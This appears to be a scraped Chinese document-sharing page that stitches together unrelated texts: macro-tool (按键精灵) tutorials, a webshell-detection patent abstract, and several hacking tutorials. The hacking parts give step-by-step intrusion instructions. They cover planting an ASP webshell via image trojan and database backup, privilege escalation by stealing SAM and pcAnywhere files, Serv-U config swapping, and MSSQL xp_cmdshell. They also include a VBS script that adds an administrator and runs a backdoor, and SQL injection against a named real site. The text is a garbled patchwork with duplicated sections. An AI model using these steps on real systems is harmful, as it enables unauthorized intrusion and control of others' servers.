后台拿webshell【图文教程】

后台拿webshell【图文教程】

交流群51624125

QQ 1713621012 By:红方块

我们都知道一句话木马

但是这里很多后台都不支持一句话木马所以我们就用图片一句话木马

图片一句话木马生成器群里面我有放的软件拿后台教程群里面也有

那现在就进入正题

1.先上传我们的图片一句话木马

提示上传成功

我们看这里一般都会显示他的存放地址

我们复制下来这个是要用到的

2.备份文件

先点数据库备份这里说明一下有的网站是不支持的

然后把我们上面复制下来的地址粘贴到这里（下面图片）

我们在弄个备份数据库名称这里是XXX . asp 不过最后还是上成asa了

备份成功！！

我们可以进去看下的把后缀从admin开始复制到网页上面具体格式为这里是http://XXXXXXX/XXXXX/XX.asa

总之他显示什么就弄什么下面是数据库

3.上传大马

我们用一句话asp木马工具群里面有叫一句话助手的来着

这里用的是第二个你们可以用别的（我一共弄了3个）

木马地址----------我们刚刚的数据库地址

密码----------一句话你设置的密码

文件名----------你们随便

文件内容----------asp大马内容

填好之后点提交

好了看已经上传好了！！

显示成功

那如果你到这一步就说明你已经拿到了

看下我们的webshell

这里他是自定义的放到了备份的数据库目录下可以看到

最后那个XXX . asp就是我们第三步里面的文件名是自定义的

这里就是尾声了多余的也不说了就推荐一下我的群好了欢迎加入

最全的WEBSHELL提权大大全

WEBSHELL权限提升技巧 c: d: e:..... C:\Documents and Settings\All Users\「开始」菜单\程序\ 看这里能不能跳转，我们从这里可以获取好多有用的信息比如Serv-U的路径， C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ 看能否跳转到这个目录，如果行那就最好了，直接下它的CIF文件，破解得到pcAnywhere 密码，登陆 c:\Program Files\serv-u\ C:\WINNT\system32\config\ 下它的SAM，破解密码 c:\winnt\system32\inetsrv\data\ 是erveryone 完全控制，很多时候没作限制，把提升权限的工具上传上去，然后执行 c:\prel C:\Program Files\Java Web Start\ c:\Documents and Settings\ C:\Documents and Settings\All Users\ c:\winnt\system32\inetsrv\data\ c:\Program Files\ c:\Program Files\serv-u\ C:\Program Files\Microsoft SQL Server\ c:\Temp\ c:\mysql\(如果服务器支持PHP） c:\PHP(如果服务器支持PHP） 运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限 还可以用这段代码试提升，好象不是很理想的 如果主机设置很变态，可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat，vbs等木马。 根目录下隐藏autorun.inf C:\PROGRAM FILES\KV2004\ 绑 D:\PROGRAM FILES\RISING\RAV\ C:\Program Files\Real\RealServer\ rar Folder.htt与desktop.ini 将改写的Folder.htt与desktop.ini，还有你的木马或者是VBS或者是什么，放到对方管理员最可能浏览的目录下 replace 替换法捆绑 脚本编写一个启动/关机脚本重起 删SAM 错 CAcls命令 FlashFXP文件夹Sites.dat Sites.dat.bak Stats.dat Stats.dat.bak Ring的权限提升21大法！ 以下全部是本人提权时候的总结很多方法至今没有机会试验也没有成功，但是我是的确看见别人成功过

1433提权全教程

1433端口提权的过程 随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（https://www.sodocs.net/doc/a813960300.html,）广告完毕。 把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录 显示错误信息： Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了， 当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权， 但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上

传无法成功，这条路走不通了， 这时就考虑用到工具的文件管理功能了 看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

授渔之1433提权全教程

授渔之<一次1433端口提权的过程> 随着网络安全意识的提高，很多服务器的安全防范都非常严了，本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器，于是研究一段时间，虽然进步不大，但是还是想把经验分享一下，正所谓授人以鱼不如授人以渔，而我现在正是告诉你打鱼的方法，下面就以一台服务器为例了，本例使用工具为SQL TOOLS 2.0，论坛有下，请自行搜索。插播不是广告的广告：该工具集成度高，简单的sql指令无须使用分离器，直接在此工具中执行即可，其文件管理功能非常强大，反正我用着太顺手了，推荐一下，本文原创发布于＝华夏黑客同盟论坛＝（https://www.sodocs.net/doc/a813960300.html,）广告完毕。 把扫到的ip和sa及口令填入连接后，用dos命令功能试试列目录 显示错误信息： Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因: 126(找不到指定的模块。)。 这种情况大家在提权过程中经验遇到啊，它是由于xplog70.dll这个文件被删除或者做了其他限制，导致出现这个错误的 这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用，无法执行命令提权自然就无从说起了， 当然我们还可以考虑其他的存储过程如：sp_oacreate和sp_oamethod来直接添加帐号，或者使用沙盘指令来提权， 但这台服务器，这些功能都被限制了，还是考虑下恢复xplog70.dll了，测试上

传无法成功，这条路走不通了， 这时就考虑用到工具的文件管理功能了 看到了把，和windows的资源管理器一样好用，目录列出来了，搜索一下可以用来提权的东西吧，这里我们首先要去看看 sql的安装路径里的xplog70.dll文件是否存在 看到吧，xplog70.dll文件不见了，被删除了，xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西

按键精灵教程

变量！神奇的小柜子 变量就是会变化的量。就像一个小柜子，我们可以在柜子里装载不同的东西，而当我们需要找到这些东西的时候，只要记住柜子的名字就可以了。 使用变量的方法是：先定义（给柜子起名）、再赋值（将物品放进柜子）、最后使用（根据柜子名字找到放在其中的物品）。 使用Dim命令定义变量，例如: Dim str1 //定义变量str1 Dim var1=22 //定义变量Var1，并且赋值为22 例子1：使用变量设置输出文字的内容 1、下面红色的是3行脚本，请把他复制到“源文件”当中 Dim str1 str1 = "你很聪明" SayString str1 2、Dim str1 就是定义变量，也就是说我们创建了一个小柜子，给他起名为str1 3、str1 = "你很聪明" 就是赋值，我们把"你很聪明"这几个字放到str1这个小柜子里 4、SayString str1 表示我们输出str1这个变量的内容，也就是说把str1这个小柜子里的内容拿出来交给SayString 这个命令去使用。 5、如果你希望修改喊话的内容，只要修改str1这个小柜子里的内容就可以了。 例子2：变量的一些用法 a=1 把数字1放进柜子a中。 b="你猜对了吗？" 把字符串你猜对了吗？放进柜子b中。字符串必须用""包含。 dc=3.14159265 把小数放进柜子dc中。 num1=1 num1=33 num2=55 sum=num1+num2 首先把33和55分别放入num1和num2中。然后把他们取出来，做加法操作（加法是由CPU来处理的），把结果放在sum中。结果sum等于88 num1=1 num1=33 num1被给值为1，然后又给值为33。此时，num1中存储是的33。1就被覆盖掉了。没有了：） sum=sum+1 这句不等同于数学的加法，也是初学者不容易理解的地方。我们只要想，把sum拿出来和1做加法，再放回sum中就可以了。sum原来的值是88，做完加法后，sum等于89。 pig=1 pig=pig*3+pig 能猜出pig最后等于几么？1*3+1。结果是4 例子3：使用变量输入1到100的数字 VBSCall RunApp("notepad") Delay 2000 a=1

学会用按键精灵制作游戏脚本之前后台坐标关联教程

学会用按键精灵制作游戏脚本之前后台坐标关联教程 来源：按键学院【按键精灵】 各位大大在切换前后台命令的时候，有没有遇到坐标切换呢~ 有没有发现前后台的命令，对同一个窗体内容，居然坐标不同！！ 今天~院刊就跟大家普及下前台坐标与相对应的后台坐标知识~ 什么是前台坐标和后台坐标呢？ 什么是前台坐标？ 以屏幕左上角的坐标为起点(0,0，从而获取到的各个窗体的坐标，就是前台坐标。 什么是后台坐标？ 以窗口左上角为起点(0,0，从而获取到的这个窗体内的相对坐标，就是后台坐标。 如图： 我们来举个栗子吧，例如txt文本里的输入文字的起始点。

至此，各位大大知道前后台坐标的联系了吧。一个是绝对坐标（前台），一个是相对坐标（后台）。 那么如何进行前后台坐标的切换呢 从上图里，聪明机智的小伙伴们就会发现：如果知道了前台坐标，也知道了窗口左上角的值。那么窗口客户区内的 任意后台的坐标，不是都可以通过以下计算来获得了： 后台x坐标=客户区前台x坐标-客户区左上角前台x坐标 后台y坐标=客户区前台y坐标-客户区左上角前台y坐标 如何获得客户区前台的x，y坐标呢？ 我们使用按键精灵自带的窗体插件命令：GetWindowRect来获取。 命令名称： GetWindowRect 窗口边框大小 命令功能：得到窗口句柄的边框大小(包括标题栏 命令参数：参数1 整数型，窗口句柄

返回值：字符串型，边框大小(包括标题栏 注：返回为：边框窗口左角X坐标|边框窗口左上角Y坐标|边框窗口右下角X坐标 |边框窗口右下角Y坐标 //下面这句是得到窗口句柄的边框大小(包括标题栏 sRect = Plugin.Window.GetWindowRect(句柄 将你所要获取的窗口句柄填入括号内就可以啦~ 范例举例： 举个萌萌哒的例子：向记事本特定位置输入文字。 例如我要往“hello”和“按键精灵”中间插入文字： 2014-9-17 18:03 上传 下载附件(8 KB 思路： 每次打开记事本的位置，有可能会有变化。而我们又不能每次都要去获取它的坐标再改脚本，这样太费力了。所以呢，只要锁定了记事本，知道了目标在记事本中的相对位置就可以操作啦。 同理，寻找游戏里的物品目标，前台不稳定。后台命令也是基于相对坐标的。 1. 先找到目标窗体的左上角坐标 （通过窗体插件命令：GetWindowRect来获取） 2. 再找到目标窗体内，“hello”和“按键精灵”中间的坐标 （为了方便，我们用抓抓获取。在游戏中，可以通过找图找色来获取前台坐标）

按键精灵 输入框

按键精灵输入框 一、控件介绍 在输入框中单击鼠标会出现插入点光标，我们可以直接在输入框中输入文字或文本信息。二、创建控件 创建输入输入框和之前创建标签的方法是一样的。在工具栏上点击输入框控件。移动鼠标到QUI的窗体上，这时鼠标就会变成“十”字形状，这就说明已经成功选择创建输入框了。然后，在编辑区域按住鼠标左键，框选一块区域，松开鼠标左键。这时界面上就创建出一个输入框出来了，如下图。 三、控件属性 在QUI在输入框的属性总共有10项。其中有4个基本属性和5个位置属性外加1个其他属性（控件样式）。 基本属性分别是:名称（Name）、显示（Visible）、有效（Enabled）、标题（Caption）。 位置属性分别是：左边(Left)、上边（Top）、宽度（Width）、高度（Height）、显示顺序（Z Order）。

其他属性为“密码”。这个属性是为了提供满足用户们输入密码而设计的，当这个属性值为“是”时，在输入框输入的全都了“*”代替。并且该属性在QUI编辑时就已经设置好，在运行过程当中无法修改这个属性。 （1）获取输入框的值 输入框控件是制作界面中最使用的控件类型。主要是提供给用户输入使用的。所以在输入框的控件中最经常发生的一件事情就是获取输入框值的内容。 和标签一样，输入框的内容我们也称它为文本。但是和标签不同的是，输入框文本对应的是T ext。 既然我们知道了输入框上的文本属性是通过Text来访问的。那么我们就在脚本里面获取内容来使用。 在界面中创建一个输入框，默认输入框的名称是“InputBox1”。输入框的文本内容默认也是“InputBox1”。然后我们切换到脚本的源码视图，编辑代码获取文本框控件上的文本内容，并且将这个内容弹窗显示出来。 MessageBox Form1.InputBox1.Text 编辑完成后，点击【保存】，然后进入调试，点击【自定义界面】，可以看到刚才创建的输入框的内容。修改输入框里面的内容，比如修改成“ABCDEF”，点击【保存】，然后【确定】，最后关闭QUI窗体，点击【启动】。 这时就可以看到弹出窗口里面显示着“ABCDEF”。

获得网站WEBSHELL权限的截图0

获得网站WEBSHELL权限 一、学习目标：在得到了管理员帐号的情况下，进入网站的管理员后台，以备份数据库得到WEBSEHLL。 二、知识要点：在入侵网站之前，信息搜集是第一步，任何情况的搜集，当情况搜集有初步成果之后，应该首先试图获得管理员的帐号和密码，然后找出网站的后台（看管理员在后台的什么地方），对于现成的整站系统而言，通常后台是固定的，只要搞到网站就能以管理员的帐号进入。进了后台，就有了能力对网站进行操作，我们就有了很大的把握获得的一个WEBSEHLL。所谓WEBSEHLL，也就是一个脚本，这个脚本，具有可以管理WEB、修改主页内容的权限，如果要修改别人的主页，一般都需要这个权限（上传漏洞要得到的也是这个权限）。它可对网站的任何文件进行编辑，移动，复制，删除。如果某个服务器权限设置得不好，那么通过webshell可以得到该服务器的最高权限----即可以得到的是整个网站的操作权限，并且是进一步渗透获得主机权限的立脚点。 在进入管理后台后，获得WEBSHELL的首选方法是通过"备份数据库"的方法上传一个扩展名改成GIF的ASP木马，(之所以要把ASP的木马护展名由ASP改为GIF，是因为一般网站都有检测护展名，当检测到护展名为ASP时就不会允许上传)，上传之后，用备份数据库的办法，把GIF护展名，备份成为ASP护展名，然后连接备份后的ASP地址，就能打开你上传的ASP木马，一个WEBSEHLL就到手了。具体方法为在备份数据库地址里输入你上传的GIF文件的相对地址，在恢复地址里输入你要生成的ASP地文件的路径和文件名，然后恢复数据库即可。 三、实验步骤 1、IE浏览器中输入https://www.sodocs.net/doc/a813960300.html,/bbsxp1（之前已经通过某方法得到网站后台管理员的用户名、口令）。 （1）以管理员身份登录网站前台，如图1。 图1 （2）在图2界面中进入ACCESS数据库管理，并在图3界面中输入后台管理员密码完成登录。

2018-2019-按键精灵知识-word范文模板 (11页)

本文部分内容来自网络整理，本司不为其真实性负责，如有异议或侵权请及时联系，本司将立即删除！ == 本文为word格式，下载后可方便编辑和修改！ == 按键精灵知识 篇一：按键精灵新手入门 按键精灵文档简介： 基本信息→基本介绍→使用说明→软件功能→软件特点→使用方法→更新日志→常见问题→安全认证 按键精灵： 按键精灵是一个模拟鼠标键盘动作的软件。通过制作脚本，可以让按键精灵代替双手，自动执行一系列鼠标键盘动作。按键精灵简单易用，不需要任何编程知识就可以作出功能强大的脚本。只要在电脑前用双手可以完成的动作，按键精灵都可以替代完成. 按键精灵基本信息：软件版本：按键精灵(Quick Macro) 9.0版 软件大小： 7.93MB 更新时间： 201X-08-11 软件类别：国产软件 / 键盘鼠标 软件语言：简体中文 / 繁体中文 应用平台： Win9x/Win201X/WinXP/WinVista/Win7 软件性质：免费软件 开发商：兄弟工作组 按键精灵会员注册： 按键精灵基本介绍： 按键精灵可以帮你操作电脑。类似于按键精灵的软件有 "

按键游侠"，"super-ec"等。从编程的角度看，集合一些插件的脚本编辑、调试工具。代码不公开。生成的小精灵，模式化界面，界面中有广告，以此盈利 软件功能：1．网络游戏中可作脚本实现自动打怪，自动补血，自动说话等； 2．办公族可用它自动处理表格、文档， 按键精灵 自动收发邮件等 3．任何觉得“有点烦”的电脑操作都可以替完成。按键精灵软件特点： 1．操作简单，非常容易上手； 2．功能强大，脚本语句丰富； 3．界面友好，使用鼠标就可以完成大部分脚本的制作动作 4．兼容性好，支持大部分Windows下的软件 5．拥有“神盾”保护功能。 按键精灵使用方法：第一步：设计脚本功能 按键精灵 写脚本之前要想清楚自己要做什么功能。在这里来制作一个每隔5秒自动按F5刷新网页的脚本。 第二步：设计脚本 为制作了组图来说明如何制作这个脚本。 做任何脚本都是两步：第一步先设计功能，第二步就是用按键精灵提供的命令完成这些功能。 常见问题： 什么是脚本? 脚本就是一系列可以反复执行的命令.通过一些判断条件，可以让这些命令具有一定的智能效果. 按键精灵软件如何制作脚本?

九种经典的Webshell提权

说到花了九牛二虎的力气获得了一个webshell， 当然还想继续获得整个服务器的admin权限，正如不想得到admin的不是好黑客～ 嘻嘻～～好跟我来，看看有什么可以利用的来提升权限 第一 如果服务器上有装了pcanywhere服务端，管理员为了管理方便 也给了我们方便，到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里， 那么就会用到ftp，服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写～ 好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖，启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接～ 好的，还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限，那我们就 把后门（server.exe）传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0)

按键精灵经典教程

按键精灵经典教程 一、键盘命令（2~5页） 二、鼠标命令（5~13页） 三、控制命令（13~22页） 四、颜色/图像命令（22~28页） 五、其他命令（28~355页）五、网游脚本实例（35~最后）

一、键盘命令 命令名称：GetLastKey 检测上次按键命令功能：检测上次按键 命令参数：参数1 整数型，可选：变量名 返回值：无 脚本例子：(8.x语法) 复制代码 1.//脚本运行到这一行不会暂停,调用的时候立即返回，得到调用之前最后一次 按下的按键码保存在变量Key里。 2.Key=GetLastKey() 3.If Key = 13 Then 4. Msgbox "你上次按下了回车键" 5.End If 脚本例子：(7.x语法) 复制代码 1.//脚本运行到这一行不会暂停,调用的时候立即返回，得到调用之前最后一次 按下的按键码保存在变量Key里。 2.GetLastKey Key 3.If Key = 13 4. Msgbox "你上次按下了回车键" 5.EndIf 命令名称：KeyDown 按住 命令功能：键盘按住 命令参数：参数1 整数型，键盘虚拟码（8.X支持按键字符） 参数2 整数型，次数 返回值：无 脚本例子：(8.x语法) 复制代码 1.//KeyDown、KeyDownS、KeyDownH 2.//KeyDownS: 超级模拟方式,兼容性更强,对键盘和鼠标没有特别的要 求,PS2(圆口)和USB接口的键盘都可以使用 3.//KeyDownH: 硬件模拟方式,仅支持PS(圆口)的键盘点击查看使用硬件模

4.KeyDown 65,1 5.//65是A键的按键码，上面的语句表示按住A键1次 6. 7.KeyDown "A",1 8.//上面的支持按键字符，语句表示按住A键1次 脚本例子：(7.x语法) 复制代码 1.//KeyDown、KeyDownS、KeyDownH 2.//KeyDownS: 超级模拟方式,兼容性更强,对键盘和鼠标没有特别的要 求,PS2(圆口)和USB接口的键盘都可以使用 3.//KeyDownH: 硬件模拟方式,仅支持PS(圆口)的键盘点击查看使用硬件模 拟方式的注意事项 4.KeyDown 65,1 5.//65是A键的按键码，上面的语句表示按住A键1次 命令名称：KeyPress 按键 命令功能：键盘按键 命令参数：参数1 整数型，键盘虚拟码（8.X支持按键字符） 参数2 整数型，次数 返回值：无 脚本例子：(8.x语法) 复制代码 1.//KeyPress、KeyPressS、KeyPressH 2.//KeyPressS: 超级模拟方式,兼容性更强,对键盘和鼠标没有特别的要 求,PS2(圆口)和USB接口的键盘都可以使用 3.//KeyPressH: 硬件模拟方式,仅支持PS(圆口)的键盘点击查看使用硬件 模拟方式的注意事项 4.KeyPress 65,1 5.//65是A键的按键码，上面的语句表示按A键1次 6. 7.KeyPress "A",1 8.//上面的支持按键字符，语句表示按A键1次 脚本例子：(7.x语法) 复制代码 1.//KeyPress、KeyPressS、KeyPressH 2.//KeyPressS: 超级模拟方式,兼容性更强,对键盘和鼠标没有特别的要 求,PS2(圆口)和USB接口的键盘都可以使用 3.//KeyPressH: 硬件模拟方式,仅支持PS(圆口)的键盘点击查看使用硬件

按键精灵图文教程

手把手教你用“按键精灵”图文教程 类型：转载 按键精灵是一个可以模拟电脑操作的软件，您在电脑上的一切动作都可以让按键精灵模拟执行，完全解放您的双手。按键精灵可以帮你操作电脑，不需要任何编程知识就可以作出功能强大的脚本。 如果你还为一些枯燥、繁琐的电脑操作而烦恼，按键精灵绝对会是你最好的帮手。 那么，按键精灵具体能帮我们干什么呢？我们来列举几个例子来说明下。 * 网络游戏中可作脚本实现自动打怪,自动补血,自动说话等； * 办公族可用它自动处理表格、文档，自动收发邮件等； * 任何你觉得“有点烦”的电脑操作都可以替你完成。按键精灵第一个实现了“动动鼠标就可以制作出脚本”的功能。我们不希望为了使用一个小软件而去学习编程知识，考虑到这些，所以按键精灵完全界面操作就可以制作脚本。按键精灵的脚本是纯粹的TXT文件，即使是目前新增了插件功能，也引入了数字签名的机制。因此我们可以放心的使用网站上的脚本而不用担心会有病毒。 脚本就是一系列可以反复执行的命令.通过一些判断条件,可以让这些命令具有一定的智能效果.我们可以通过”录制”功能制作简单的脚本,还可通过”脚本编辑器”制作更加智能的脚本.今天我们就通过录制一个最简单的脚本，来手把手的教大家使用按键精灵。 上网一族一般开机后会先看看自己邮箱，或者看看自己博客；每天如此，可能都有些烦了。现在好了，把这些繁杂的事情交给按键精灵吧。今天我们就来录制一个自动登录博客，并对整个页面进行浏览的脚本。 首先，我们打开“按键精灵”。其运行界面如下（图1）： 图1 运行界面 打开软件后点击工具栏上“新建”项（如图2）；之后进入“脚本编译器”界面（如图3）。

(零基础)手工注入+burpsuite拿webshell

之前由于不会安装vm版的bt5而在网上求救，结果认识了一找不到片的基友，00后的，，感觉顿时无语了…………聊天时，他说sqlmap 和burpsuite都很强大…………玩完sqlmap后，就一直想学burpsuite来着，，但是一直都没学，这几天才刚开始完的…………感觉确实强大，能够拦截，查看和修改网站流量………………不废话，开始 目标站，https://www.sodocs.net/doc/a813960300.html,(不要问我怎么找的……百度高级搜索inurl:asp?id=XX) 点一链接，在网站后加 and 1=1 回车，页面正常，，加and 1=2 ,回车，不正常，，，判断存在sql 注入漏洞（当然存在啊，不然怎么做教程，只是说下如何判断注入） 然后order by 查询字段（是叫做字段吗，我对概念不清楚，虽然我为这还自学了mysql……暂且叫字段吧） 如图，12不正常，11正常，说明字段为11（11之前的都正常）

然后在地址后加入 union select 1，2，3，4，5，6，7，8，9，10，11 from admin,也就是访问 https://www.sodocs.net/doc/a813960300.html,/show_content.asp?id=1361 union select 1，2，3，4，5，6，7，8，9，10，11 from admin（别问我admin哪来的，，微软access数据库默认的表，也不能说是默认的吧，大多都是这样，下面的username和password也是这样），看图吧 看到2 3 没，爆出查询点了，，把2换成username，3换成password（当然2换成password，3为username也行），回车，如图 username为admin，，密码为MD5加密的值，拿去解密，如图

按键精灵教程：启动热键的设置技巧

按键精灵教程：启动热键的设置技巧 来源：按键学院【按键精灵】热键设置 启动热键：启动当前脚本 暂停/继续热键：暂停或继续当前脚本。（暂停之后再继续，是从脚本暂停的位置继续向下执行，而不是重新运行脚本） 中止热键：结束当前脚本。 全部中止热键：结束所有脚本。 热键可以设置为一个单一键，例如：F10、F11 也可以设置组合键，例如：ctrl+a、ctrl+b 还可以设置为鼠标键，例如：鼠标左键单击、右键单击等

单一键的设置 打开我们的脚本——>点击脚本属性 即可看到热键的设置界面 点击要修改的热键输入框 点击热键输入框之后，按下要设置的按键，例如：F7 设置方式十分简单，但是我们会发现，如果我们点击输入框按下enter键又或者是shift键时，不能成功的设置热键 要怎么解决呢？

要设置这些特殊键为启动热键时，我们可以点击热键输入框后面的倒三角红色按钮，然后点击键盘热键，选择我们需要的按键 组合键的设置 组合键的设置和单一键的设置方法是一样的 打开我们的脚本——>点击脚本属性 即可看到热键的设置界面 点击要修改的热键输入框 点击热键输入框之后，按下要设置的按键，例如：Ctrl+A 或者三个组合键：Ctrl+Alt+A 鼠标热键的设置 要设置鼠标键为热键，不能直接在热键输入框里点击鼠标键来设置 需要点击热键输入框后面的倒三角红色按钮，然后点击鼠标热键，选择我们需要的鼠标键

热键模式设置 当我们在一些游戏里，发现启动热键按了无效的时候。我们可以尝试更换热键模式再使用。我们可以理解为，每个游戏的机制不同，就像人一样，有的喜欢吃甜有的喜欢吃辣。而我们的热键模式就好比是：酸甜苦辣咸。 不喜欢酸就换成甜，不喜欢甜就换成辣，口味多样，总有一款适合你。 热键模式有五种： 普通模式：不占用热键原有功能，兼容性稍差 增强模式：兼容性最好，但占用热键原有功能 硬件模式：能解除屏蔽，只适用于win2000以上 软件模式：兼容性好，但可能被误报木马或病毒 共享模式：兼容性好，可适用大部分操作系统 设置方式： 1、点击设置按钮 2、点击热键，即跳转到热键模式的设置界面

按键精灵学习教程

按键精灵学习教程 一、 1、子程序和函数调用演示 //<>---------------------------------------------子程序调用 Call 普通子程序() Call 代入参数的子程序(100,50) //<>---------------------------------------------函数调用 Msgbox 代入参数的函数(100,50) Sub 普通子程序() Msgbox "我是普通子程序，被调用了" End Sub Sub 代入参数的子程序(a,b) c=a+b Msgbox "我是代入参数的子程序，被调用了。结果值为：" & c End Sub Function 代入参数的函数(a,b) c=a*b 代入参数的函数= "我是代入参数的函数，被调用了。结果值为：" & c End Function 2、重启脚本运行演示 For i=0 to 2 Delay 1000 Call Plugin.Msg.ShowScrTXT(0, 0, 1024, 768, "屏幕内容填写" & i, "0000FF") Next RestartScript //重新启动脚本运行 3、中文名变量演示

//<>---------------------------------------------用户自定义变量支持中文名为变量名 UserVar 启动=DropList{"打开":1|"关闭":0}=0 "补血启动开关" UserVar 补血=0 "补血百分比%" //<>---------------------------------------------定义变量支持中文名为变量名 Dim 提示 提示="补血启动开关未设置打开！" If 启动=1 Then Msgbox "补血百分比为："& 补血& "%" Else Msgbox 提示 End If 4、选择条件结构演示 UserVar 变量=0 "输入（0~9）数字" //<>---------------------------------------------以下是选择条件结结构判断 Select Case 变量 Case 0 Msgbox "你输入的数字为：0" Case 1 Msgbox "你输入的数字为：1" Case 2 Msgbox "你输入的数字为：2" Case 3 Msgbox "你输入的数字为：3" Case Else Msgbox "你输入的数字不正确，请输入（0~3）数字！" End Select 5、下拉型用户自定义 //说明：{}当中是下拉的选项=0是指的默认显示哪个选项(从0开始) UserVar Var1=DropList{"低于10%时补血":"0.1"|"低于20%时补血":"0.2"|"低于30%时补血":"0.3"}=2 "自动补血设置" UserVar Var2=0 "普通自定义变量" MessageBox(Var1) MessageBox(Var2) 6、退出脚本运行演示

【CN109905385A】一种webshell检测方法、装置及系统【专利】

(19)中华人民共和国国家知识产权局 (12)发明专利申请 (10)申请公布号 (43)申请公布日 (21)申请号 201910123769.5 (22)申请日 2019.02.19 (71)申请人 中国银行股份有限公司 地址 100818 北京市西城区复兴门内大街1 号 (72)发明人 俞学浩　蔡传智　王倩　 (74)专利代理机构 北京三友知识产权代理有限 公司 11127 代理人 李辉 (51)Int.Cl. H04L 29/06(2006.01) G06F 17/27(2006.01) (54)发明名称 一种webshell检测方法、 装置及系统(57)摘要 本说明书实施例公开了一种webshell检测 方法、装置及系统，所述方法包括获取待检测网 页的PHP脚本数据对应的第一中间字节码数据； 利用构建的监督学习算法对所述第一中间字节 码数据进行识别，获得所述待检测网页的 webshell检测结果，其中，所述监督学习算法包 括对确定为webshell的PHP脚本数据以及确定为 正常的PHP脚本数据对应的第二中间字节码数据 进行训练得到的webshell检测模型。利用本说明 书各实施例，可以提高PHP webshell检测的准确 性。权利要求书2页 说明书13页 附图3页CN 109905385 A 2019.06.18 C N 109905385 A

权　利　要　求　书1/2页CN 109905385 A 1.一种webshell检测方法，其特征在于，包括： 获取待检测网页的PHP脚本数据对应的第一中间字节码数据； 利用构建的监督学习算法对所述第一中间字节码数据进行识别，获得所述待检测网页的webshell检测结果，其中，所述监督学习算法包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行训练得到的webshell检测模型。 2.根据权利要求1所述的方法，其特征在于，所述利用构建的监督学习算法对所述第一中间字节码数据进行识别，包括： 基于预设的分词库，利用TF-IDF算法对所述第一中间字节码数据进行特征提取，获得所述待检测网页的特征数据，其中，所述分词库包括对确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据对应的第二中间字节码数据进行分词处理后获得分词数据； 利用构建的监督学习算法对所述待检测网页的特征数据进行识别。 3.根据权利要求2所述的方法，其特征在于，所述利用TF-IDF算法对所述第一中间字节码数据进行特征提取，包括： 将所述第一中间字节码数据进行分词处理，获得所述待检测网页的PHP脚本数据对应的第一分词集合； 利用TF-IDF算法计算所述分词库中每个词相对所述第一分词集合的TF-IDF值； 将所述TF-IDF值按照相应的词在分词库中的位置进行一一对应，获得由TF-IDF值组成的向量，将该向量作为所述待检测网页的特征向量。 4.根据权利要求2或3所述的方法，其特征在于，所述预设的分词库采用下述方式构建： 获取确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据，获得样本集合； 将所述样本集合中的各脚本数据转换成中间字节码数据，获得各脚本数据对应的第二中间字节码数据； 对所述第二中间字节码数据进行分词处理，获得各脚本数据对应的第二分词集合； 将所述第二分词集合进行融合处理，获得分词库。 5.根据权利要求4所述的方法，其特征在于，所述webshell检测模型采用下述方式训练得到： 利用TF-IDF算法计算所述分词库中每个词相对所述第二分词集合的TF-IDF值，获得相应脚本数据的特征向量； 利用监督学习算法对所述确定为webshell的PHP脚本数据以及确定为正常的PHP脚本数据所对应的特征向量进行学习，获得webshell检测模型。 6.根据权利要求1所述的方法，其特征在于，所述待检测网页的webshell检测结果包括待检测网页是否属于webshell网页或者属于webshell网页的概率。 7.一种webshell检测装置，其特征在于，所述装置包括： 数据获取模块，用于获取待检测网页的PHP脚本数据对应的第一中间字节码数据； 